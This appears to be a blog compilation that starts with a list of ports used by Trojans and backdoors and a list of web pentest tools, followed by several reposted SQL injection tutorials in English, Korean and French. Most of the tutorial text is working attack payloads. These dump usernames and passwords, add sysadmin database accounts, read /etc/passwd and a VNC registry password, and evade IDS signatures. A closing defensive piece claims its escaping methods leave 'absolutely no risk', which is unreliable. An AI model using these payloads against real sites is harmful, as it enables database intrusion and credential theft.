TCP 27999 TW Authentication/Key Distribution and
TCP 30100 Netsphere (Windows Trojan)
TCP 30101 Netsphere (Windows Trojan)
TCP 30102 Netsphere (Windows Trojan)
TCP 31337 BO2K
TCP 31785 Hack-A-Tack (Windows Trojan)
TCP 31787 Hack-A-Tack (Windows Trojan)
TCP 32000 XtraMail v1.11
TCP 32768 Filenet TMS
TCP 32769 Filenet RPC
TCP 32770 Filenet NCH
TCP 32771 Solaris RPC
TCP 32772 Solaris RPC
TCP 32773 Solaris RPC
TCP 32774 Solaris RPC
TCP 32775 Solaris RPC
TCP 32776 Solaris RPC
TCP 32777 Solaris RPC
TCP 32780 RPC
TCP 33434 traceroute use
TCP 34324 Big Gluck (Windows Trojan)
TCP 36865 KastenX Pipe
TCP 40421 Master's Paradise (Windows Trojan)
TCP 40422 Master's Paradise (Windows Trojan)
TCP 40423 Master's Paradise (Windows Trojan)
TCP 40426 Master's Paradise (Windows Trojan)
TCP 40841 CSCP
TCP 43118 Reachout
TCP 43188 Reachout
TCP 44818 Rockwell Encapsulation
TCP 45092 BackGate (Windows rootkit)
TCP 45678 EBA PRISE
TCP 45966 SSRServerMgr
TCP 47262 Delta Source (Windows Trojan)
TCP 47557 Databeam Corporation
TCP 47624 Direct Play Server
TCP 47806 ALC Protocol
TCP 47808 Building Automation and Control Networks
TCP 48000 Nimbus Controller
TCP 48001 Nimbus Spooler
TCP 48002 Nimbus Hub
TCP 48003 Nimbus Gateway
TCP 49400 Compaq Insight Manager
TCP 49401 Compaq Insight Manager
TCP 54320 Orifice 2000 (TCP)
TCP 65000 distributed attack tool / Devil (Windows Trojan)
TCP 65301 pcAnywhere-def

백도어와 트로이목마가 주로 사용하는 포트

666 Satanz Backdoor
1001 Silencer
1001 WebEx
1011 Doly Trojan
1170 Psyber Stream Server
1234 Ultors Trojan
1245 VooDoo Doll
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor
2001 Trojan Cow
2023 Ripper
2115 Bugs
2140 Deep Throat
2140 The Invasor
2801 Phineas Phucker
30129 Masters Paradise
3700 Portal of Doom
4092 WinCrash
4590 ICQTrojan
5000 Sockets de Troie
5001 Sockets de Troie 1.x
5321 Firehotcker
5400 Blade Runner
5401 Blade Runner 1.x
5402 Blade Runner 2.x
5569 Robo-Hack
6670 DeepThroat
6771 DeepThroat
6969 GateCrasher
6969 Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor 1.x
7306 NetMonitor 2.x
7307 NetMonitor 3.x
7308 NetMonitor 4.x
7789 ICKiller
9872 Portal of Doom
9873 Portal of Doom 1.x
9874 Portal of Doom 2.x
9875 Portal of Doom 3.x
10067 Portal of Doom 4.x
10167 Portal of Doom 5.x
9989 iNi-Killer
11000 Senna Spy
11223 Progenic trojan
12223 Hack?99 KeyLogger
1245 GabanBus
1245 NetBus
12361 Whack-a-mole
12362 Whack-a-mole 1.x
16969 Priority
20001 Millennium
20034 NetBus 2 Pro
21544 GirlFriend
22222 Prosiak
33333 Prosiak
23456 Evil FTP
23456 Ugly FTP
26274 Delta
31337 Back Orifice
31338 Back Orifice
31338 DeepBO
31339 NetSpy DK
31666 BOWhack
34324 BigGluck
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise 1.x
40423 Masters Paradise 2.x
40426 Masters Paradise 3.x
50505 Sockets de Troie
50766 Fore
53001 Remote Windows Shutdown
61466 Telecommando
65000 Devil
6400 The tHing
12346 NetBus 1.x
20034 NetBus Pro
1243 SubSeven
30100 NetSphere
1001 Silencer
20000 Millenium
65000 Devil 1.03
7306 NetMonitor
1170 Streaming Audio Trojan
30303 Socket23
6969 Gatecrasher
61466 Telecommando
12076 Gjamer
4950 IcqTrojen
16969 Priotrity
1245 Vodoo
5742 Wincrash
2583 Wincrash2
1033 Netspy
1981 ShockRave
555 Stealth Spy
2023 Pass Ripper
666 Attack FTP
21554 GirlFriend
50766 Fore, Schwindler
34324 Tiny Telnet Server
30999 Kuang
11000 Senna Spy Trojans
23456 WhackJob
555 Phase0
5400 BladeRunner
4950 IcqTrojan
9989 InIkiller
9872 PortalOfDoom
11223 ProgenicTrojan
22222 Prosiak 0.47
53001 RemoteWindowsShutdown
5569 RoboHack
1001 Silencer
2565 Striker
40412 TheSpy
2001 TrojanCow
23456 UglyFtp
1001 WebEx
1999 Backdoor
2801 Phineas
1509 Psyber Streaming Server
6939 Indoctrination
456 Hackers Paradise
1011 Doly Trojan
1492 FTP99CMP
1600 Shiva Burka
53001 Remote Windows Shutdown
34324 BigGluck
31339 NetSpy DK
12223 Hack?99 KeyLogger
9989 iNi-Killer
7789 ICQKiller
9875 Portal of Doom
5321 Firehotcker
40423 Master Paradise
121 BO jammerkillahV
31 Masters Paradise
27374 #I don't know but it's a lot of scanning for this port# 
Posted by yangdaegam
l
Posted by yangdaegam
l

open-labs.png

httptraceroute02.tar.gz HTTPTRACEROUTE: HTTP based traceroute PoC.

sqlibf113b2.tar.gz SQLIBF: Tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application.

crazy_encoder3.tar.gz CRAZY_ENCODER: Miscellaneous HTTP encodings calculator. (Win32 + MFC gui)

gzip_encoding01.tar.gz GZIP_ENCODING: Command line tools for simple manipulation of Gzip Encoded HTTP transfers.

iisbruteforcer15.tar.gz IISBF: HTTP authentication cracker. It's a tool that launchs an online dictionary attack to test for weak or simple passwords against protected areas on an IIS Web server.

metoscan05.tar.gz METOSCAN: Simple tool for scanning the HTTP methods supported by a Web server. It works by testing a URL and checking the responses for the different requests.

easy_scraper02.tar.gz EASY_SCRAPER: Simple, easy and dirty perl based Web Data Scraper. It works by querying a Website multiple times and copying returned content to generate a custom database. (Perl + 1337 Tk gui)

hacker_webkit02.tar.gz HACKER_WEBKIT: Pack of scripts useful for doing pentesting in a wide range of Web servers. Each module includes 3 components: Command execution, Directory browsing and File uploading. Current modules are: ASP, CFM, EXE, JSP, PHP, PL, SERVLET and SH.

ecoscan04.tar.gz ECOSCAN: Simple tool for scanning the HTTP encodings supported by a Web server. It works testing a URL and checking the responses for the different probes.

dirb204.tar.gz DIRB: Tool for doing Web Scanning by looking for hidden Web Objects. It works by launching a dictionary attack against a Web server and analizing the responses. DIRB main purpose is to help in Web application security auditing.

ob-session04.tar.gz OB-SESSION: HTTP session cookie analyzer script. It does some tests over the session identifiers and calculate the linear correlation between the different IDs. This gives an approximation to the strength of the cookie against cookie prediction attacks.

Posted by yangdaegam
l

SQL Injection

WORK/SECURITY 2010. 8. 13. 15:18

  
Sql Injection Paper                       
            
     By zeroday.         
        zeroday [ at ] blacksecurity.org 

1.Introduction.
2.Testing for vulnerabilities.
3.Gathering Information.
4.Data types.
5.Grabbing Passwords.
6.Create DB accounts.
7.MySQL OS Interaction.
8.Server name and config.
9.Retrieving VNC password from registry.
10.IDS Signature Evasion.
11.mySQL Input Validation Circumvention using Char().
12.IDS Signature Evasion using comments.
13.Strings without quotes.

1. When a box only has port 80 open, it's almost certain the admin will patch his server,
The best thing to turn to is web attacks. Sql Injection is one of the most common web attacks.
You attack the web application, ( ASP, JSP, PHP, CGI..etc) rather than the webserver
or the services running on the OS.
Sql injection is a way to trick using a qurey or command as a input via webpages,
most websites take parameters from the user like username and passwrod or even their emails.
They all use Sql querys.

2. First of you should start with something simple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try another ones are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--

3.Gathering Infomation.
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will Find the actual Version of the computer, OS/service pack.

4.Data types.

Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'

Oracle
CRATE USER name IDENTIFIED BY pass123
        TEMPORARY TABLESPACE temp
         DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.
Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.

# milw0rm.com [2006-03-28]



--SQL Injection Attack

--drop table users
create table users ( id int,
    username varchar(255),
    password varchar(25),
    privs int );

insert into users values (0, 'admin', '1234', 0xffff)
insert into users values (0, 'guest', 'guest', 0x0000)
insert into users values (0, 'chris', 'password', 0x00ff)
insert into users values (0, 'fred', 'sesame', 0x00ff)

 

--1 : 테이블명 알아내기(having)
select * from users where username='' having 1=1-- and password = ''

 

--2 : 필드명 알아내기(group by)
select * from users where username='' group by users.id having 1=1-- and password=''
select * from users where username='' group by users.id, users.username having 1=1-- and password=''
select * from users where username='' group by users.id, users.username, users.password having 1=1-- and password=''
select * from users where username='' group by users.id, users.username, users.password, users.privs having 1=1-- and password=''

 

--3 : 필드타입 알아내기(union)
select * from users where username='' union select sum(username) from users-- and password=''
select * from users where username='' union select sum(password) from users-- and password=''
select * from users where username='' union select sum(privs) from users-- and password=''


--4 : 계정만들기(insert)
select * from users where username=''; insert into users values(666,'attacker','foobar',0xffff)-- and password=''


--5 : 버전 및 환경 알아내기(@@version)
select * from users where username='' union select @@version, 1, 1, 1-- and password=''
select * from users where username='' union select 1, @@version, 1, 1-- and password=''

 

--6 : 계정 추출하기(type convert error)
select * from users where username='' union select min(username),1,1,1 from users where username > 'a'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'admin'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'attacker'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'chris'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'fred'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'guest'-- and password=''

 

--7 : 계정의 패스워드 알아내기
select * from users where username='' union select password,1,1,1 from users where username='admin'-- and password=''

 

--8 : Transact-SQL
select * from users where username=''; begin declare @ret varchar(8000)
                                       set @ret=':'
                                       select @ret=@ret+' '+username+'/'+password from users where
                                       username > @ret
                                       select @ret as ret into foo
                                       end-- password=''
select * from users where username='' union select ret,1,1,1 from foo-- password=''

 

 

-- Blind Sql Injection

 

일반적인 Sql Injection 공격을 막기 위해서는 사용자가 입력한 질의에 대해 불필요한 에러페이지를
노출시키지 않는 것이 좋다.

그러나 이러한 방법 또한 최선의 선택은 아니라고 할 수 있는데, 이러한 해결방법은 바로 Bline Sql
Injection 공격을 통해 우회가 가능하다.

Blind Sql Injection이란 마치 장님이 손으로 더듬듯이, 알아내고자 하는 정보의 답변을 미리 대략적
으로 예측해서 그것이 참인지 거짓인지를 질의하고, 서버의 반응으로 참/거짓 여부를 판단하면서 참이
될때 까지 시도 함으로서 정보를 알아내는 방법이다.

이 방법을 통하여 데이터베이스의 테이블 이름, 컬럼 이름 등의 정보를 알아내는 것이 가능하다.

 

Detecting to Blind Sql Injection

 

공격을 하기 전에, 해당 페이지에 취약점이 존재하는지 확인하는 작업이 필요하다.

* 서버측 쿼리문
strSQL="select user_id, name, user_pw from member where user_id='"&id&"' and user_pw='"&password&"'

* 정상 질의
http://victim.co.kr/member/member_login_check.asp?user_id=hacker&user_pw=1234

* 취약점 테스팅 질의
http://victim.co.kr/member/member_login_check.asp?user_id=hacker&user_pw=1234' and 1=1--

 

만약 위 질의의 결과가 같다면 Blind Sql Injection에 취약하다고 볼 수 있다. 이제 Blind Sql Injection에
취약한 어플리케이션에 and 1=1 대신 참/거짓을 구별할 수 있는 쿼리문을 삽입하면 되며, 이때 데이터베이스가
이전과 같은 결과값을 출력하는지(참), 아니면 값을 출력하지 않는지(거짓)를 통해 자신의 입력한 내용이
참인지 거짓인지를 쉽게 판별할 수 있다.

 

이와같은 방법으로 참/거짓의 여부에 따라 예측내용을 조금씩 바꾸어서 질의하는 과정을 반복함으로써
최종적으로는 정확한 값을 알아낼 수 있게 되는 것이다. 그러나, Blind Sql Injection의 경우
수작업으로하기에는 무리가 따르며, 주로 자동화된 툴을 사용하여 공격을 하게 된다


[FRENCH] Full SQL injection Tutorial Par Moudi - EvilWay Team ( MySQL )

*** Sommaire ***

__________
Chapitre I)
__________

0) Description : SQL INJECTION.
1) Comment reconnaitre qu'un site est vulnérable a un SQL ?
2) Trouver le nombre de colomns.
3) Utiliser la fonction UNION.
4) Trouver la version du MySQL.
5) Trouver les noms des colomns et tables et l'exploitation.

__________
Chapitre II)
__________

1) Description : Blind SQL INJECTION.
2) Comment reconnaitre qu'un site est vulnérable au BLIND SQL ?
3) Trouver la version du MySQL.
4) Tester si la sélection marche.
5) Trouver les noms des colomns et tables et l'exploitation.


-----------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-----------------------------

>> Passons aux choses sérieuses maintenant...

__________
Chapitre I)
__________

0) Description : SQL INJECTION.

Le SQL INJECTION est l'une des communes les plus vulnérables dans les applications type " web " de nos jours.
Il permet d'exécuter la requête dans la base de données et d'avoir grace a l'url a certains renseignements confidentiels et bien d'autres...

=============> 

1) Comment reconnaitre qu'un site est vulnérable a un SQL ?

Commencons ce tuto en force !
Prénons un exemple d'un site par exemple:

http://www.site-exemple.com/news.php?id=9
Maintenant, il faudra tester si ce site est vulnérable par SQL, c'est simple , nous ajoutons un ' ( quote ) et donc l'exemple deviendra :
http://www.site-exemple.com/news.php?id=9' <= quote ajouter !

Maintenant, si vous appercevez une erreur du genre:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

Ou une erreur de cet exemple, cela signifie que ce site est vulnérable par SQL. ^^

=============> 

2) Trouver le nombre de columns.

Pour trouver le nombre de columns , on utilisera " ORDER BY " qui demande a la base un résultat.

Donc maintenant, comment on utilise cela? Eh bien simplement augmenter le nombre jusqu'à ce que nous obtenons une erreur comme dans l'exemple ci-dessous:

http://www.site-exemple.com/news.php?id=9 order by 1/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 2/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 3/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 4/* <-- error (une erreur du genre: Unknown column '4' in 'order clause' ou un truc de ce genre s'affichera)
	
Cela signifie que l'on dispose de 3 colonnes, car nous avons reçu une cause d'erreur sur 4.

=============> 

3) Utiliser la fonction UNION.

Passons aux choses un peux plus dure..
Avec la fonction UNION, nous avons la possibilité de sélectionner plusieurs données en un seul SQL a la fois.
Donc nous aurons:
http://www.site-exemple.com/news.php?id=9 union all select 1,2,3/* (nous avons deja trouver que le nombre de column est bien 3 , revoir la section (Chapitre I , cours : 2). )

si nous voyons quelques chiffres sur l'écran, c'est-à-dire 1 ou 2 ou 3 alors l'union a fonctionné.
Si cela ne fonctionne pas , essayer de changer le /* par -- 

=============> 

4) Trouver la version du MySQL.
Disons que nous avons le numero 2 , maintenant il faudra connaitre la version MySQL , pour cela nous allons remplacer le numero 2 par @@version ou version() et nous aurons quelques choses du genre: 4.1.33-log or 5.0.45 ou du meme type...

alors l'exemple sera:
http://www.site-exemple.com/news.php?id=9 union all select 1,@@version,3/*
Bingo , la version du MySQL est devant vos yeux :)

=============> 

5) Trouver les noms des columns et tables et l'exploitation.

Maintenant si la version est < 5 ( 4.1.33, 4.1.12...) , vous devez savoir que les noms de table commun pour cette version sont: user/s , admin/s , member/s .........
pour les columns c'est: username , user, usr, user_name, password, pass, passwd, pwd ....

Passons a son exploitation:

Cherchons la table d'admin:

http://www.site-exemple.com/news.php?id=9 union all select 1,2,3 from admin/*
Si vous appercevez le numero 2 , alors cela signifie que vous venez de trouver la table d'admin et qu'il existe...

Cherchons les noms des columns:

http://www.site-exemple.com/news.php?id=9 union all select 1,username,3 from admin/* (si vous avez une erreur ici , alors essayer un autre nom de column)
Si nous avons le nom d'utilisateur qui s'affiche à l'écran, par exemple, être admin ou superadmin etc alors c'est bon...

Maintenant pour la column de mot de passe,

http://www.site-exemple.com/news.php?id=9 union all select 1,password,3 from admin/* (si vous avez une erreur ici , alors essayer un autre nom de column)
Si nous avons le password a l'écran du type hash ou sans, alors c'est bon, le type varie en fonction de la base de donnée

Il ne reste donc plus qu'a les mettre ensemble avec 0x3a , qui est une valeur de hex pour la colonne.

http://www.site-exemple.com/news.php?id=9 union all select 1,concat(username,0x3a,password),3 from admin/*

Vous allez voir quelques choses du genre:
username:password , admin:admin , admin:unhash..

=============> 
=============> 

__________
Chapitre II)
__________

1) Description : Blind SQL INJECTION.
Le blind se définit comme le sql normal sauf qu'il est un peu plus dure....

=============> 

2) Comment reconnaitre qu'un site est vulnérable au BLIND SQL ?

Prenons un exemple de:
http://www.site-exemple.com/news.php?id=9

Quand on ouvre la page , nous voyons des articles, images ou autres...
Vous pouvez donc tester le blind :

http://www.site-exemple.com/news.php?id=9 and 1=1 <--- ceci est toujours vrai !
Si la page se charge normalement , c'est bon.

http://www.site-exemple.com/news.php?id=9 and 1=2 <--- ceci est faux
Donc si quelques textes ou images ou un truc est oublié ou déformer, alors ce site est exploitable par le blind SQL.

=============> 

3) Trouver la version du MySQL.

Pour avoir la version dans le blind, nous utiliserons le " substring ".

http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=4
Si la page s'affiche normalement, alors c'est une version 4.

http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=5
Si la page s'affiche normalement, alors c'est une version 5.

=============> 

4) Tester si la sélection marche.

Quand le select ne marche pas, nous utiliserons donc le subselect.

Exemple:
http://www.site-exemple.com/news.php?id=9 and (select 1)=1

si la page se charge normalement, alors le subselect marche.
et si nous voulons voir si nous avons l'access au mysql.user , on fait:

Exemple:
http://www.site-exemple.com/news.php?id=9 and (select 1 from mysql.user limit 0,1)=1
Si la page se charge normalement, alors nous avons access au mysql.user et nous pourons avoir quelques mot de passe
en utilisant la fonction load_file() et OUTFILE. =============> 5) Trouver les noms des colomns et tables et l'exploitation. Exemple: http://www.site-exemple.com/news.php?id=9 and (select 1 from users limit 0,1)=1 Si la page se charge normalement sans erreur alors la table users existe. Si vous obtenez une erreur , alors vous devez changer le users et mettre autre chose, a vous de devinez :D c'est un bon jeu hein... disons que nous avons trouver la table.. maintenant nous avons besoin du nom de la colonne.. tout comme cela du nom de table, nous commencons la devinette !! http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Si la page se charge normalement, alors le nom de la colonne est password. Ainsi , nous avons la table et la colonne , exploitons :) http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Nous continuons a changer le " 80 " jusqu'a trouver une erreur, suivez bien l'exemple: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Nous avons eu une fois de plus un chargement normal.. on continue http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Pareille, continuons http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 ERREURRR !!! donc le premier caractère dans username est char(99) si vous convertisser cela en ascii nous avons la lettre " c " . Maintenant cherchons le second caractère: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Noter que je change ,1,1 a ,2,1 pour avoir le second caractère http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 La page se charge normalement http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 ERREUR nombre inférieur.. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Chargement normal , élevé. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 ERREUR donc nous savons des a présent que le deuxieme caractère est char(105) et que c'est 'i' , cela fera "ci" jusqu'a présent... Faite cela en mode croissant jusqu'a ce que vous obtenez la fin. (si< 0 retourne faux, nous avons atteint la fin alors). ----------------------------- >>>>>>>>>>>>>>>>>>>>>>>>>>>> ----------------------------- Nous voici a la fin de ce tuto... Si vous cherchez bien sur le net , vous pourez avoir plein de programme qui feront tout ceci , mais apprenez a le faire manuellement, c'est important :) . Je remercie ma team ( EVILWAY ) Je remercie MizoZ, ZuKa, str0ke et tout ceux que j'ai oublié... J'espere que ce tuto vous a aider en quelques choses... Contact MSN: m0udi@9.cn Second name: SixSo Nice site that i love: http://www.opensc.ws/ # milw0rm.com [2009-07-02]


[[[[[]]]]]]]]]]] Avoiding SQL Injection By Moudi - EvilWay Team [[[[[]]]]]]]]]]]

SQL injections are among the flaws the most widespread and dangerous in PHP. 
This tutorial will explain clearly the concept of SQL Injection and how to avoid them once and for all.

--------------------------------------------------------------------

>>>>>> 
Summary of tutorial:
  I) Presentation of the problem.
     => The variables containing strings
  II)Security .
     => Explanation
     => Numeric variables
        .Method 1
        .Method 2
>>>>>> 

--------------------------------------------------------------------


I) Presentation of the problem.
   ___________________________

There are two types of SQL injection:

* Injection into the variables that contain strings;
* Injection into numeric variables.

These are two very different types and to avoid them, it will act
differently for each of these types.

######################
The variables containing strings:
######################

Imagine a PHP script that fetches the age of a member according to its
nickname. This nickname has gone from one page to another via the URL
(by $ _GET what: p). This script should look like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$pseudo = $_GET['pseudo'];
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Well keep you well, this script is a big SQL injection vulnerability.
Suffice it to a bad boy putting in place the username in the URL a query
like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


It is to arrive to show (just an example), for example the password for
the member with the id 1. I will not explain in detail the operation for
fear that someone is not nice to walk around. Well, so let us go to the
security:).

II) Security .
_______________

To secure this type of injection is simple. You use the function
mysql_real_escape_string ().

######################
Uh ... It does what it?
######################

This feature adds the "\" character to the following characters:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
NULL, \ x00, \ n, \ r, \, ', "and \ X1A
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

######################
And what's the point?
######################

As you have noticed in previous injection, the attacker uses the quote
(to close the 'around $ nick): if she is prevented from doing that, the
bad boy will only have to look elsewhere . This means that if one
applies a mysql_real_escape_string () to the variable name like this ...

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$pseudo = mysql_real_escape_string($_GET['pseudo']);
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The application is completely secure.
Explanation

######################
Injection hacker to recall:
######################

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Well if we apply mysql_real_escape_string () to the variable $ name used
in the query is what will the injection:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This means that we do not even come out of assessments around $ nick in
the request because the \ has been added. There is another function
somewhat similar to mysql_real_escape_string () is addslashes (), why
not have used? Well recently, a security hole was discovered on this if
it is used on a PHP 4.3.9 installation with magic_quotes_gpc enabled.

######################
Numeric variables:
######################

This type of injection is less known than the previous one, making it
more frequent, and it starts as just now with an example. This time, it
displays the age of a member according to its id, and by passing it by a
form ($ _POST) to change:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
...
$id = $_POST['id'];
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


mysql_real_escape_string () would be nothing here, since if an attacker
wants to inject SQL code, it will not need to use quotes, because the
variable $ id is not surrounded by quotes. Simple example of
exploitation:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2 UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This injection did exactly the same as the previous one, except that
here, to avoid it, there are two solutions:

     * Change the contents of the variable so it contains only numbers;
     * Check if the variable actually contains a number before using it in a query. 

##########
Method 1:
##########

We'll use a function , intval () This function returns regardless of the
contents of a variable its numerical value. For example:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$variable = '1e10';  // $variable vaut '1e10'
$valeur_numerique = intval($variable); // $valeur_numerique vaut 1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now back to our sheep:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = intval($_POST['id']);
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

That is: you can stop there and is more than enough, but I recommend you
continue to find another method, or you have air beast if you find this
method on a code that is not yours without understand it.

############
Méthode 2:
###########

Here we use a function that returns TRUE when a variable contains only
numbers and FALSE if it is not the case this function is is_numeric (),
we will use it in a condition that checks whether is_numeric ( ) returns
TRUE well.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = $_POST['id'];
if (is_numeric($id))
{
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
else
{
echo "Trying to hack me ? MOTHA FUCKAH xD";
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

##################################################################
What is the best, depending intval () and is_numeric ()?
##################################################################

Well I will say that they are both equally effective, they are equal.
But I prefer inval () since with is_numeric () write more code, and if
the variable does not contain only numbers, the request is canceled (in
principle, but of course you can run the same query by choosing an
default value for the variable used). Well that's it! You know all about
securing your applications. If you apply these methods, there is
absolutely no risk of having a fault type SQL injection on its website
(or PHP).

[»] Thanks to:  [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell.. ]
[»] Contact MSN:[ m0udi@9.cn ]
[»] Site :      [ https://security-shell.ws/forum.php ]

# milw0rm.com [2009-07-27]


Tools 

1. SQLIer -
